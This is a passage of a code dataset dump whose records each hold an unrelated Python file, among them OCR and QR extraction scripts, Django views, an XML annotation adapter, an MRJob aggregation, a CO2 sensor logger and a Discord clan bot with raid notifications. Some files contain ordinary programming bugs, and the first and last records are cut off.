Programming/bit/calc/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"129750105","text":"from ocr_cnn import OCR_NeuralNetwork\nimport ensemble\n\ndef ocr_cnn_ensamble_builder(classes, nb_epochs, number_of_nets=5, path=\"checkpoints//temp\"):\n\t\n\tmy_ensemble = ensemble.ensemble()\n\n\tfor i in range(number_of_nets):\n\t\tnet = OCR_NeuralNetwork(classes, nb_epochs=nb_epochs, model_dir=path, model_name=str(i), batch_size=128)\n\t\tmy_ensemble.add_model(net)\n\n\treturn my_ensemble\n\n\n\n\n\n","sub_path":"Notebooks/ocr_ensamble_builder.py","file_name":"ocr_ensamble_builder.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"294415402","text":"# This class will be an abstract get ID data class\n\nclass ExtractIDData(object):\n\n def __init__(self):\n self.data = \"\";\n\n # call this method to get the data associated with the frame in string type\n def get_data(self, frame):\n self.data = self._extract_data(frame)\n return self.data\n\n # extract the data depending on the specific way we are using it\n def _extract_data(self, frame):\n pass\n\nimport cv2\nimport os\nimport numpy as np\nimport zbar\nimport sys\n\n# used to extarct the data via qr code\nclass ExtractIDDataQR(ExtractIDData):\n\n def __init__(self):\n ExtractIDData.__init__(self)\n self.scanner = zbar.Scanner()\n\n # get the data by reading the frame and decoding it\n def _extract_data(self, frame):\n results = self.scanner.scan(frame)\n final_result = \"\"\n for result in results:\n final_result += str(result.data.decode('utf-8'))\n return final_result\n\n# used to extract the code via text recognition using tesseract\nclass ExtractIDDataTesseract(ExtractIDDate):\n def __init__(self):\n ExtractIDData.__init__(self)\n self.TEXT_ID_LIST = ['Topic nr.','Topic --']\n\n def _extract_data(frame):\n img_arr = Image.fromarray(frame) # convert from array to image\n img_arr_grey = img_arr.convert('L') # use grey converter (greyscale)\n img_arr_thresh = img_arr_grey.point(lambda x: 0 if 0<=x<=150 else -256) # set threshold for black and white\n frame_txt = image_to_string(img_arr_thresh) # get text from black and white image\n return frame_txt\n\n#\n# # used to extract data using hamming and SIMM\nclass ExtractIDDataHamming(ExtractIDDate):\n\n def _extract_data(frame):\n img_arr = Image.fromarray(frame) # convert from array to image\n img_arr_grey = img_arr.convert('L') # use grey converter (greyscale)\n img_arr_thresh = img_arr_grey.point(lambda x: 0 if 0<=x<=150 else -256) # set threshold for black and white\n frame_txt = image_to_string(img_arr_thresh) # get text from black and white image\n return frame_txt\n\ndef main():\n Extract_ID = ExtractIDDataQR()\n my_dir = os.getcwd()\n file_name = sys.argv[1]\n file_dir = os.path.join(my_dir,file_name)\n image = cv2.imread(file_dir, cv2.IMREAD_GRAYSCALE)\n print(Extract_ID.get_data(image))\n\n\nif __name__==\"__main__\":\n main()\n","sub_path":"TestingEnvironment/TestScripts/QR_testing/basic_examples/ExtractIDData.py","file_name":"ExtractIDData.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"555587161","text":"from django.shortcuts import render\n\n# List of Dictionaries below\nposts = [\n {\n 'author': 'CoreyMS',\n 'title': 'Blog Post 1',\n 'content': 'First post content',\n 'date_posted': 'August 27, 2019'\n },\n {\n 'author': 'Jane Doe',\n 'title': 'Blog Post 2',\n 'content': 'Second post content',\n 'date_posted': 'August 28, 2019'\n }\n]\n\n\ndef home (request):\n # Here we set a dictionary called context\n # the 'posts' key variable is accessible within our \n # home.html template\n # the corresponding value for the dict is the posts list of dicts\n # which we defined above\n context = {\n 'posts': posts\n }\n return render(request, 'Blog/home.html', context)\n \n\ndef about (request):\n return render(request, 'Blog/about.html')\n \n\n\n\n\n","sub_path":"DjangoBlogProject/Django_Blog_Project/Blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"8314536","text":"'''\nCheck SubTree:\n Determine if t2 is a subtree of t1\n'''\n\n\nclass Node:\n def __init__(self, data=None):\n self.data = data\n self.left = None\n self.right = None\n\ndef preOrder(node, s): # Gets the preorder traveral string adding an X for None\n\tif node == None:\n\t\ts = s + 'X'\n\t\treturn\n\ts = s + str(node.data) # Add root\n\tpreOrder(node.left, s) # Add left node\n\tpreOrder(node.right, s) # Add right node\n\ndef containsTree(t1, t2):\n\ts1 = ''\n\ts2 = ''\n\n\tpreOrder(t1, s1)\n\tpreOrder(t2, s2)\n\n\treturn s2 in s1 # Check if s2 is a substring of s1","sub_path":"Cracking the Coding Interview/Trees and Graphs/CheckSubtree.py","file_name":"CheckSubtree.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"48127148","text":"import math\nimport xml.etree.ElementTree as et\nfrom datasetTools.AnnotationAdapter import XMLAdapter\n\n\nclass ASAPAdapter(XMLAdapter):\n \"\"\"\n Exports predictions to ASAP annotation format\n \"\"\"\n '''\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n '''\n\n def __init__(self, imageInfo: dict, verbose=0):\n super().__init__(imageInfo, \"ASAP_Annotations\", verbose=verbose)\n self.annotations = et.Element('Annotations')\n self.annotations.text = \"\\n\\t\\t\"\n self.annotations.tail = \"\\n\\t\"\n self.addToRoot(self.annotations)\n self.groups = et.Element('AnnotationGroups')\n self.groups.text = \"\\n\\t\\t\"\n self.groups.tail = \"\\n\"\n self.addToRoot(self.groups)\n self.nbAnnotation = 0\n self.nbGroup = 0\n self.classCount = {}\n\n def addAnnotation(self, classInfo: {}, points):\n if classInfo[\"name\"] not in self.classCount:\n self.classCount[classInfo[\"name\"]] = 0\n\n mask = et.Element('Annotation')\n mask.set('Name', \"{} {} ({})\".format(classInfo[\"name\"], self.classCount[classInfo[\"name\"]], self.nbAnnotation))\n mask.set(\"Type\", \"Polygon\")\n mask.set(\"PartOfGroup\", classInfo[\"name\"])\n mask.set(\"Color\", \"#F4FA58\")\n mask.text = \"\\n\\t\\t\\t\"\n mask.tail = \"\\n\\t\\t\"\n self.annotations.append(mask)\n\n coordinates = et.Element('Coordinates')\n coordinates.text = \"\\n\\t\\t\\t\\t\"\n coordinates.tail = \"\\n\\t\\t\"\n mask.append(coordinates)\n\n for i, pt in enumerate(points):\n coordinate = et.Element('Coordinate')\n coordinate.set(\"Order\", str(i))\n coordinate.set(\"X\", str(pt[0]))\n coordinate.set(\"Y\", str(pt[1]))\n coordinate.tail = \"\\n\\t\\t\\t\" + (\"\\t\" if i != len(points) - 1 else \"\")\n coordinates.append(coordinate)\n\n self.classCount[classInfo[\"name\"]] += 1\n self.nbAnnotation += 1\n\n def addAnnotationClass(self, classInfo: {}):\n group = et.Element('Group')\n group.set('Name', classInfo[\"name\"])\n group.set('PartOfGroup', \"None\")\n group.set(\"Color\", classInfo[\"color\"])\n group.text = \"\\n\\t\\t\\t\"\n group.tail = \"\\n\\t\\t\"\n\n attribute = et.Element('Attributes')\n attribute.tail = \"\\n\\t\\t\"\n group.append(attribute)\n\n self.nbGroup += 1\n self.groups.append(group)\n\n def __str__(self):\n # Fix indentation of Annotations and AnnotationGroups closing tags\n if self.nbAnnotation == 0:\n self.annotations.text = \"\"\n else:\n self.annotations[-1].tail = \"\\n\\t\"\n if self.nbGroup == 0:\n self.groups.text = \"\"\n else:\n self.groups[-1].tail = \"\\n\\t\"\n return super().__str__()\n\n @staticmethod\n def getPriorityLevel():\n return 10\n\n @staticmethod\n def canRead(filePath):\n canRead = XMLAdapter.canRead(filePath)\n if canRead:\n tree = et.parse(filePath)\n root = tree.getroot()\n canRead = root.tag == \"ASAP_Annotations\"\n return canRead\n\n @staticmethod\n def readFile(filePath):\n canRead = ASAPAdapter.canRead(filePath)\n assert canRead\n tree = et.parse(filePath)\n root = tree.getroot()\n masks = []\n # Going through the XML tree and getting all Annotation nodes\n for annotation in root.findall('./Annotations/Annotation'):\n maskClass = annotation.attrib.get('PartOfGroup')\n ptsMask = []\n # Going through the Annotation node and getting all Coordinate nodes\n for points in annotation.find('Coordinates'):\n xCoordinate = points.attrib.get('X')\n yCoordinate = points.attrib.get('Y')\n ptsMask.append([xCoordinate, yCoordinate])\n masks.append((maskClass, ptsMask))\n return masks\n","sub_path":"datasetTools/ASAPAdapter.py","file_name":"ASAPAdapter.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"421243259","text":"from PIL import Image\nimport numpy as np\nimport cv2\n\n## Read image and change the color space\nimgname = \"test_4.jpg\"\nimg = cv2.imread(imgname)\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n## Get mser, and set parameters\nmser = cv2.MSER_create()\nmser.setMinArea(0)\nmser.setMaxArea(10000)\n\n## Do mser detection, get the coodinates and bboxes\ncoordinates, bboxes = mser.detectRegions(gray)\n\n## Filter the coordinates\nvis = img.copy()\nboxs = []\ncoords = []\n\n\ndef resize(num):\n a = 1\n while len(boxs)-num > a:\n x1 = boxs[num][0] + boxs[num][2]\n x2 = boxs[num + 1][0]\n x3 = x2 + boxs[num + 1][2]\n y1 = boxs[num][1] + boxs[num][3]\n y2 = boxs[num + 1][1]\n y3 = y2 + boxs[num + 1][3]\n if x1 >= x2 >= boxs[num][0] or y1 >= y2 >= boxs[num][1]:\n if x1 >= x2:\n if x1 < x3:\n boxs[num][2] += x3 - x1\n print('ok1')\n if y1 >= y2:\n if y1 < y3:\n boxs[num][3] += y3 - y1\n print('ok2')\n del boxs[num + 1]\n else:\n break\n print(\"a\", a)\n a += 1\n\n\nfor coord in coordinates:\n bbox = cv2.boundingRect(coord)\n x, y, w, h = bbox\n # cv2.rectangle(gray, (x-2, y-2), (x+w+2, y+h+2),(3, 255, 4), 1)\n coords.append(coord)\n boxs.append([x, y, w, h])\n\n\nfor i in range(len(boxs)):\n if i == len(boxs)-2:\n break\n else:\n print(i)\n resize(i)\n continue\n\nfor i in range(len(boxs)):\n print(boxs[i])\n x = boxs[i][0]\n y = boxs[i][1]\n w = boxs[i][2]\n h = boxs[i][3]\n cv2.rectangle(gray, (x , y), (x + w, y + h), (3, 255, 4), 1)\ncv2.imshow(\"hi\", gray)\ncv2.waitKey(0)\n\n## colors\n# colors = [[255,255,255]]\ncolors = [[43, 43, 200], [43, 75, 200], [43, 106, 200], [43, 137, 200], [43, 169, 200], [43, 200, 195], [43, 200, 163],\n [43, 200, 132], [43, 200, 101], [43, 200, 69], [54, 200, 43], [85, 200, 43], [116, 200, 43], [148, 200, 43],\n [179, 200, 43], [200, 184, 43], [200, 153, 43], [200, 122, 43], [200, 90, 43], [200, 59, 43], [200, 43, 64],\n [200, 43, 95], [200, 43, 127], [200, 43, 158], [200, 43, 190], [174, 43, 200], [142, 43, 200], [111, 43, 200],\n [80, 43, 200], [43, 43, 200]]\n\n## Fill with random colors\nnp.random.seed(0)\ncanvas1 = img.copy()\ncanvas2 = cv2.cvtColor(gray, cv2.COLOR_GRAY2BGR)\ncanvas3 = np.zeros_like(img)\n\nfor cnt in coords:\n xx = cnt[:, 0]\n yy = cnt[:, 1]\n color = colors[np.random.choice(len(colors))]\n canvas1[yy, xx] = color\n canvas2[yy, xx] = color\n canvas3[yy, xx] = color\n\n## Save\ncv2.imwrite(\"result1.png\", canvas1)\ncv2.imwrite(\"result2.png\", canvas2)\ncv2.imwrite(\"result3.png\", canvas3)\n\n# cv2.imshow(\"imgae_1\", canvas3)\n# cv2.waitKey(0)\n\n# for coord in coordinates:\n# bbox = cv2.boundingRect(coord)\n# x, y, w, h = bbox\n# cv2.rectangle(canvas1, (x - 2, y - 2), (x + w + 2, y + h + 2), (3, 255, 4), 1)\n\n# cv2.imshow(\"canvas3\", canvas1)\n# cv2.waitKey(0)\n\n\n","sub_path":"ocr_2.py","file_name":"ocr_2.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"508757192","text":"class Solution(object):\n def gameOfLife(self, board):\n \"\"\"\n :type board: List[List[int]]\n :rtype: void Do not return anything, modify board in-place instead.\n \"\"\"\n if not board:\n return\n \n if board and not board[0]:\n return\n \n for i in range(len(board)):\n for j in range(len(board[0])):\n alive = board[i][j]\n live_c, dead_c = self.checkNeighbours(i,j,board)\n board[i][j] = self.determineState(live_c,dead_c,alive)\n \n for i in range(len(board)):\n for j in range(len(board[0])):\n board[i][j] = board[i][j] >> 1\n \n \n def checkNeighbours(self,i,j,board):\n live_c = 0\n dead_c = 0\n for a in range(i-1,i+2,1):\n for b in range(j-1,j+2,1):\n if a>=0 and b>=0 and acolumn data and provide header->choices if choices is less than total\n \"\"\"\n # get one column to get total\n first_key = data.keys()[0]\n total = len(data[first_key])\n\n attributes = {}\n\n # any column that has less than total, get distincts\n for key,column in data.iteritems():\n uniques = set(column)\n if len(uniques) < total:\n attributes[key] = uniques\n\n return attributes ","sub_path":"DataTransform/DataTransform/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"44915244","text":"input = open('13.in').readlines()\n\nscanners = {}\nsum = 0\n\ndef pos_scan(t, l):\n\tf_len = 2 * l - 2\n\tp_t = t % f_len\n\tif p_t > f_len / 2:\n\t\tp_t = f_len - p_t\n\treturn p_t\n\nfor l in input:\n\tvals = l.strip().split(': ')\n\tlayer = int(vals[0])\n\tl_range = int(vals[1])\n\tprint(\"layer \" + str(layer) + \" has a range of \" + str(l_range))\n\tscanners[layer] = l_range\n\t\n\tif pos_scan(layer, l_range) == 0:\n\t\tprint(\"caught!!!\")\n\t\tsum += layer*l_range\n\nprint(\"sum severity is \" + str(sum))\n\nt_offset = 0\nfor i in range(10000000):\n\tcaught = False\n\tfor layer in scanners.keys():\n\t\trange = scanners[layer]\n\t\tif pos_scan(layer+i, range) == 0:\n\t\t\t# print(\"caught!!!\")\n\t\t\tcaught = True\n\t\t\tbreak\n\tif not caught:\n\t\tt_offset = i\n\t\tbreak\n\nprint(\"found viable route at delay \" + str(t_offset))\t\t\n","sub_path":"13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"650795574","text":"breite = int(input(\"Breite = \"))\r\nhoehe = int(input(\"Höhe = \"))\r\n\r\nzeile = \"\"\r\nhilf = 1\r\nfor i in range(breite):\r\n if hilf == 4:\r\n zeile = zeile + \"+\"\r\n hilf = 1\r\n else:\r\n zeile = zeile + \"*\"\r\n hilf = hilf + 1\r\n\r\nfor i in range(hoehe):\r\n print(zeile)\r\n","sub_path":"01 Python/20171110/rechteck.py","file_name":"rechteck.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"559722057","text":"from mrjob.job import MRJob\n\nclass PartB(MRJob):\n\n def mapper(self,_,line):\n try:\n fields = line.split('\\t')\n if len(fields) == 2:\n add = fields[0]\n agg = float(fields[1])\n yield (None,(add, agg))\n except:\n pass\n\n\n def combiner(self,key,val):\n sorted_values = sorted(val,reverse=True, key=lambda tup:tup[1])\n\n i=0\n for v in sorted_values:\n yield (\"Top\",v)\n i += 1\n if i >= 10:\n break\n\n def reducer(self,key,val):\n sorted_values = sorted(val, reverse=True, key=lambda tup: tup[1])\n\n i = 0\n for v in sorted_values:\n yield ((v[0], v[1]))\n i+=1\n if i>=10:\n break\n\n\nif __name__=='__main__':\n PartB.run()","sub_path":"Part B/PartBTop10.py","file_name":"PartBTop10.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"275664125","text":"#!/bin/python\n\nimport sys, fcntl, time, rrdtool, os, argparse, socket\nfrom rrdtool import update as rrd_update\nfrom CO2Meter import *\n\n# System settings\nRRDDB_LOC = \"/var/local/monitor/co2-temp.rrd\"\nGRAPHOUT_DIR = \"/usr/share/nginx/html/images\"\n\ndef now():\n \"\"\"Get the current time.\"\"\"\n return int(time.time())\n\ndef graphout(period):\n \"\"\"Create a graph with rrdtool.\"\"\"\n\n # CO2 graph\n filename = GRAPHOUT_DIR + \"/co2-\" + period + \"-graph.png\" \n rrdtool.graph(filename,\n \"--start\", \"now-\"+period, \"--end\", \"now\",\n \"--title\", \"CO2\",\n \"--vertical-label\", \"CO2 PPM\",\n \"--width\", \"600\",\n \"-h 200\",\n \"-l 0\",\n \"DEF:co2_num=\"+RRDDB_LOC+\":CO2:AVERAGE\",\n \"LINE1:co2_num#0000FF:CO2\",\n \"GPRINT:co2_num:LAST: Last\\\\:%8.2lf %s \",\n \"GPRINT:co2_num:MIN: Min\\\\:%8.2lf %s \",\n \"GPRINT:co2_num:AVERAGE: Avg\\\\:%8.2lf %s \",\n \"GPRINT:co2_num:MAX: Max\\\\:%8.2lf %s\\\\n\",\n \"HRULE:500#16F50F:OK\",\n \"COMMENT: \\\\n\",\n \"HRULE:800#FF952B:DEV-WARN\",\n \"COMMENT: \\\\n\",\n \"HRULE:1000#3FC0EB:OFF-WARN\",\n \"COMMENT: \\\\n\",\n \"HRULE:1200#DE2C2F:CRIT\"\n )\n\n # Temperature graph\n filename = GRAPHOUT_DIR + \"/temp-\" + period + \"-graph.png\" \n rrdtool.graph(filename,\n \"--start\", \"now-\"+period, \"--end\", \"now\",\n \"--title\", \"TEMP\",\n \"--vertical-label\", \"TEMP C\",\n \"--width\", \"600\",\n \"-h 200\",\n \"DEF:temp_num=\"+RRDDB_LOC+\":TEMP:AVERAGE\",\n \"LINE1:temp_num#00FF00:TEMP\",\n \"GPRINT:temp_num:LAST: Last\\\\:%8.2lf %s \",\n \"GPRINT:temp_num:MIN: Min\\\\:%8.2lf %s \",\n \"GPRINT:temp_num:AVERAGE: Avg\\\\:%8.2lf %s \",\n \"GPRINT:temp_num:MAX: Max\\\\:%8.2lf %s \\\\n\"\n )\n\n return 0\n\ndef create_database(location):\n \"\"\"Create RRD database at given location.\n\n Updated every 5 minutes (--step 300)\n Two datasources which can hold unlimit values min and max\n Saves 1 day in 5-minute resolution (288 * (300*1/60) / 60/24)\n Saves 1 week in in 15-minute resolution (672 * (300*3/60) / 60/24)\n Saves 1 month in 1-hour resolution (744 * (300*12/60) / 60/24)\n Saves 7 years in 1-hour resolution\n\t\"\"\"\n\n rddbh = rrdtool.create(location,\n \"--step\", \"300\", \"--start\", '0',\n \"DS:CO2:GAUGE:600:U:U\",\n \"DS:TEMP:GAUGE:600:U:U\",\n \"RRA:AVERAGE:0.5:1:288\",\n \"RRA:AVERAGE:0.5:3:672\",\n \"RRA:AVERAGE:0.5:12:744\",\n \"RRA:AVERAGE:0.5:12:61320\",\n \"RRA:MIN:0.5:1:288\",\n \"RRA:MIN:0.5:3:672\",\n \"RRA:MIN:0.5:12:744\",\n \"RRA:MIN:0.5:12:61320\",\n \"RRA:MAX:0.5:1:288\",\n \"RRA:MAX:0.5:3:672\",\n \"RRA:MAX:0.5:12:744\",\n \"RRA:MAX:0.5:12:61320\"\n )\n return rddbh\n\n\nif __name__ == \"__main__\":\n\n # Set a lock on the socket to indicate that the script is already running\n try:\n s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n ## Create an abstract socket, by prefixing it with null.\n s.bind('\\0postconnect_gateway_notify_lock')\n except socket.error as e:\n # if script is already running just exit silently\n sys.exit(0)\n\n if len(sys.argv) < 2:\n dev = \"/dev/hidraw0\"\n else:\n dev = sys.argv[1]\n\n values = {}\n stamp = now()\n\n # Create RRD database if needed\n if not os.path.isfile(RRDDB_LOC):\n print(\"RRD database not found, generating it ..\")\n rddbh = create_database(RRDDB_LOC)\n\n # Open the sensor\n sensor = CO2Meter(\"/dev/hidraw0\")\n\n # Primary program loop\n while True:\n # Poll every 0.25s, a reasonable load\n time.sleep(0.25)\n # Grab the data\n try:\n data = sensor.get_data()\n except IOError as e:\n # USB device disconnected or unavailable\n sys.stderr.write(\"ERROR: CO2 monitor no longer available!\")\n sys.exit(1)\n\n # Check if all data is available\n if (\"co2\" in data) and (\"temperature\" in data):\n co2 = data[\"co2\"]\n temp = data[\"temperature\"]\n\n # Write output in standard output\n sys.stdout.write(\"CO2: {:4d} TMP: {:3.1f} \\r\".format(co2, temp))\n sys.stdout.flush()\n\n # Store data in database\n if (now() - stamp) > 60:\n print(\">>> sending dataset CO2: {:4d} TMP: {:3.1f} ..\".format(co2, temp))\n # Update database\n rrd_update(RRDDB_LOC, \"N:{:s}:{:s}\".format(str(co2), str(temp)))\n # Create graphs\n graphout(\"8h\")\n graphout(\"24h\")\n graphout(\"7d\")\n graphout(\"1m\")\n graphout(\"1y\")\n # Replace the 'now' time stamp\n stamp = now()\n","sub_path":"monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":4731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"277527611","text":"import os\nimport sys\nimport random\nfrom torch.utils.data import Dataset\nfrom utils import tokens_to_seq, contains_digit, shuffle_correlated_lists\nfrom operator import itemgetter\n\nclass Language(object):\n def __init__(self, vocab_limit, data):\n self.data = data\n\n self.vocab = self.create_vocab()\n\n truncated_vocab = sorted(self.vocab.items(), key=itemgetter(1), reverse=True)[:vocab_limit]\n\n self.tok_to_idx = dict()\n self.tok_to_idx[''] = 0\n self.tok_to_idx[''] = 1\n self.tok_to_idx[''] = 2\n self.tok_to_idx[''] = 3\n for idx, (tok, _) in enumerate(truncated_vocab):\n self.tok_to_idx[tok] = idx + 4\n self.idx_to_tok = {idx: tok for tok, idx in self.tok_to_idx.items()}\n\n def create_vocab(self):\n # Note that this vocab is case sensitive\n vocab = dict()\n for data_pair in self.data:\n tokens = data_pair[0] + data_pair[1]\n for token in tokens:\n # Track frequency of each word in the vocab\n vocab[token] = vocab.get(token, 0) + 1\n return vocab\n","sub_path":"language.py","file_name":"language.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"628476339","text":"#!/usr/bin/env python3\n\n# Standard lib imports\nimport asyncio\nimport logging\nimport datetime\nimport re\nimport sys\nfrom pathlib import Path\n\n# Non-Standard lib imports\nimport discord\nfrom discord.ext import commands\n\n# Local imports\nimport definesettings as setting\nfrom cogs.utils import separator\n\n\nasync def run():\n bot = Bot(description=setting.DESCRIPTION)\n try:\n bot.start(setting.BOT_TOKEN)\n except KeyboardInterrupt:\n await bot.logout()\n\n\ndef raids_embed():\n embed_title = \"**Raids**\"\n\n clan_banner_url = f\"http://services.runescape.com/m=avatar-rs/l=3/a=869/{setting.CLAN_NAME}/clanmotif.png\"\n raids_notif_embed = discord.Embed(title=embed_title,\n description=\"\",\n color=discord.Colour.dark_blue())\n raids_notif_embed.set_thumbnail(url=clan_banner_url)\n\n raids_notif_embed.add_field(\n name=\"Marque presença para os Raids de 21:00\",\n value=f\"{setting.RAIDS_CHAT_ID}\\n\"\n f\"\\n\"\n f\"É obrigatório ter a tag <@&376410304277512192>\\n - Leia os tópicos fixos para saber como obter\\n\"\n f\"\\n\"\n f\"Não mande mensagens desnecessárias no {setting.RAIDS_CHAT_ID}\\n\"\n f\"\\n\"\n f\"Não marque presença mais de uma vez\\n\"\n f\"\\n\"\n f\"Esteja online no jogo no mundo 75 até 20:50 em ponto.\\n\"\n f\"- Risco de remoção do time caso contrário. Não cause atrasos\",\n inline=False)\n return raids_notif_embed\n\n\nasync def raids_notification(user, channel, start_day, channel_public=None, time_to_send=\"23:00:00\"):\n while True:\n today = datetime.datetime.utcnow().date()\n if (today - start_day).days % 2 == 0 or \"testraid\" in sys.argv:\n date = str(datetime.datetime.utcnow().time())\n time = date[0:7]\n time_to_send = time_to_send[0:7]\n if time == time_to_send or \"testraid\" in sys.argv:\n team_list = []\n embed = raids_embed()\n print(f\"$ Sent Raids notification, time: {time}\")\n await channel.send(content=\"<@&376410304277512192>\", embed=embed)\n raids_notif_msg = await channel.history().get(author=user)\n team_embed = discord.Embed(\n title=f\"__Time Raids__ - {len(team_list)}/10\",\n description=\"\"\n )\n await channel.send(embed=team_embed)\n raids_team_message = await channel.history().get(author=user)\n invite_embed = discord.Embed(\n title=f\"Marque presença para 'Raids' (10 pessoas)\",\n description=f\"{separator}\\nTime: {channel.mention}\\nRequisito: <@&376410304277512192>\\n\\n\"\n f\"Marque presença apenas se for estar **online** no jogo até 20:50 em ponto **no Mundo 75.**\\n\\n\"\n f\"`in`: Marcar presença\\n\"\n f\"`out`: Retirar presença\"\n )\n await channel_public.send(embed=invite_embed)\n last_message = await channel_public.history().get(author=user)\n sent_time = datetime.datetime.now()\n while True:\n async for message in channel_public.history(after=last_message):\n if message.content.lower() == 'in':\n await message.delete()\n if len(team_list) >= 10:\n await channel_public.send(f\"{message.author.mention}, o time de Raids já está cheio! ({len(team_list)}/10)\")\n else:\n if 'Raids' in str(message.author.roles):\n if message.author.mention in team_list:\n await channel_public.send(f\"Ei {message.author.mention}, você já está no time! Não tente me enganar.\")\n else:\n await channel_public.send(f\"{message.author.mention} foi adicionado ao time de Raids. ({len(team_list)}/10)\")\n team_list.append(message.author.mention)\n else:\n await channel_public.send(f\"{message.author.mention}, você não tem permissão para ir Raids ainda. Aplique agora usando o comando `{setting.PREFIX}raids`!\")\n if message.content.lower() == 'out':\n await message.delete()\n if message.author.mention in team_list:\n team_list.remove(message.author.mention)\n await channel_public.send(f\"{message.author.mention} foi removido do time de Raids. ({len(team_list)}/10)\")\n else:\n await channel_public.send(f\"Ei {message.author.mention}, você já não estava no time! Não tente me enganar.\")\n last_message = message\n team_embed = discord.Embed(\n title=f\"__Time Raids__ - {len(team_list)}/10\",\n description=\"\"\n )\n for index, person in enumerate(team_list):\n team_embed.add_field(\n name=separator,\n value=f\"{index + 1}- {person}\",\n inline=False\n )\n try:\n await raids_team_message.edit(embed=team_embed)\n except discord.errors.NotFound:\n print(f'$ Raids team message deleted manually at {datetime.datetime.now()} - no longer accepting Raids Team entries')\n break\n diff = datetime.datetime.now() - sent_time\n if diff.total_seconds() > (60 * 60):\n print('$ No longer accepting Raids Team entries')\n break\n print('$ Deleting Raids notification messages in 30 Minutes')\n await asyncio.sleep(60 * 30)\n print('$ Deleting Raids notification messages')\n await raids_notif_msg.delete()\n await raids_team_message.delete()\n await asyncio.sleep(5)\n\n\nclass Bot(commands.Bot):\n\n def __init__(self, **kwargs):\n super().__init__(\n command_prefix=setting.PREFIX,\n description=kwargs.pop('description'),\n case_insensitive=True,\n )\n self.remove_command('help')\n self.start_time = None\n self.app_info = None\n self.raids_channel = None\n self.raids_channel_public = None\n self.loop.create_task(self.track_start())\n self.loop.create_task(self.load_all_extensions())\n\n async def track_start(self):\n \"\"\"\n Waits for the bot to connect to discord and then records the time.\n Can be used to work out up-time.\n \"\"\"\n await self.wait_until_ready()\n await asyncio.sleep(1)\n if 'raids_notif' not in setting.DISABLED_COGS:\n if setting.ATLBOT_ENV == 'prod':\n self.raids_channel = self.get_channel(393104367471034369)\n self.raids_channel_public = self.get_channel(393696030505435136)\n elif setting.ATLBOT_ENV == 'dev':\n self.raids_channel = self.get_channel(505240114662998027)\n self.raids_channel_public = self.get_channel(505240135390986262)\n raids_start_day = datetime.date(2018, 10, 25)\n raids_time = \"23:00:00\"\n print(f\"-- Channel set to send raids notification: #{self.raids_channel} at {raids_time}\")\n print(f\"-- Channel set to send raids presence notifications: #{self.raids_channel_public}\")\n self.loop.create_task(raids_notification(\n user=self.user,\n channel=self.raids_channel,\n start_day=raids_start_day,\n channel_public=self.raids_channel_public,\n time_to_send=raids_time))\n self.start_time = datetime.datetime.utcnow()\n\n async def load_all_extensions(self):\n \"\"\"\n Attempts to load all .py files in /cogs/ as cog extensions\n \"\"\"\n await self.wait_until_ready()\n await asyncio.sleep(1) # ensure that on_ready has completed and finished printing\n\n if setting.ATLBOT_ENV == 'prod':\n cogs = ['chat', 'clan', 'competitions', 'error_handler', 'rsatlantis', 'welcome_message', 'teams']\n else:\n cogs = [x.stem for x in Path('cogs').glob('*.py')]\n for extension in cogs:\n if extension not in setting.DISABLED_COGS:\n try:\n self.load_extension(f'cogs.{extension}')\n print(f'- loaded Extension: {extension}')\n except discord.ClientException:\n pass\n except Exception as e:\n error = f'{extension}\\n {type(e).__name__} : {e}'\n print(f'failed to load extension {error}')\n print('-' * 10)\n\n async def on_ready(self):\n \"\"\"\n This event is called every time the bot connects or resumes connection.\n \"\"\"\n print('-' * 10)\n self.app_info = await self.application_info()\n await self.change_presence(game=discord.Game(name=setting.PLAYING_NOW))\n print(f\"Bot logged on as '{self.user.name}'\\n\"\n f\"Mode: {setting.ATLBOT_ENV}\\n\"\n f\"Argvs: {sys.argv}\\n\"\n f\"Owner: '{self.app_info.owner}'\\n\"\n f\"ID: '{self.user.id}'\\n\"\n f\"Oauth URL: '{setting.OAUTH_URL}'\\n\\n\"\n f\"[ Bot Settings ]\\n\"\n f\"- Clan Name: '{setting.CLAN_NAME}'\\n\"\n f\"- Playing Message: '{setting.PLAYING_NOW}'\\n\"\n f\"- Commands prefix: '{setting.PREFIX}'\\n\"\n f\"- Language: '{setting.LANGUAGE}'\\n\"\n f\"- Show titles on claninfo: '{setting.SHOW_TITLES}'\")\n\n async def on_message(self, message):\n \"\"\"\n This event triggers on every message received by the bot. Including one's that it sent itself.\n If you wish to have multiple event listeners they can be added in other cogs. All on_message listeners should\n always ignore bots.\n \"\"\"\n if 